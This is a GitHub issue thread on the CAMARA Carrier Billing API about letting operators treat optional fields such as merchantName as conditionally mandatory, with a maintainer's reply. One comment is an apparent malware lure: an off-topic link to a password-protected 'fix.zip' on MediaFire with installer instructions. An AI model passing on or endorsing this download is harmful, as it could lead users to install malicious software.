### ISSUE TITLE
Conditional Mandatory Parameters as per Business Needs

### ISSUE THREAD

**Issue by ajmhussain** [camaraproject/CarrierBillingCheckOut#179]
**Problem description**

For Camara Carrier Billing API, we as a Telco Operator have certain mandatory business requirements for which certain parameters in the API need to be considered as mandatory specific to our business use-cases. As an example for Prepare Payment API, following parameters are mandatory for our business case:
```

 "merchantName": "NAME_OF_MERCHANT",
 "merchantIdentifier": "MERCHANT_IDENTIFIER_DEFINED_IN_BACKEND"
```

These fields are defined and described as optional in the Camara Specification. 
As per our communication with GSMA on below thread https://github.com/camaraproject/CarrierBillingCheckOut/issues/161 we got a response as below:

**They are optional parameters, up to the Telco Operator to implement them based on Business Scenarios or applicable regulations. This is the reason to keep them optional**

**Expected action**

Documentation needs to explicitly clarify/mention that fields defined as optional can be made conditionally mandatory based on the business needs.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PedroDiez** [comment]
Initial Feedback:

1) For optional parameters, in the case it is needed for a business integration within a given market, it shall not be a problem to use them, and up to Business Telco Operators to reach an agreement of their use in that market. This is something that will happen not only in CAMARA Carrier Billing but also other initiatives. CAMARA API should allow for that scenario, allowing different Telco Operators needs and Use Cases.

2) Probably adding a generic sentence like "They are optional parameters, up to the Telco Operator to implement them based on Business Scenarios or applicable regulations. This is the reason to keep them optional" is too generic, maybe you can attend next meeting (2nd October) and we can talk about that

3) Specifically for the Use Case referred in the issue, do you foresee any technical enhancement associated to it?
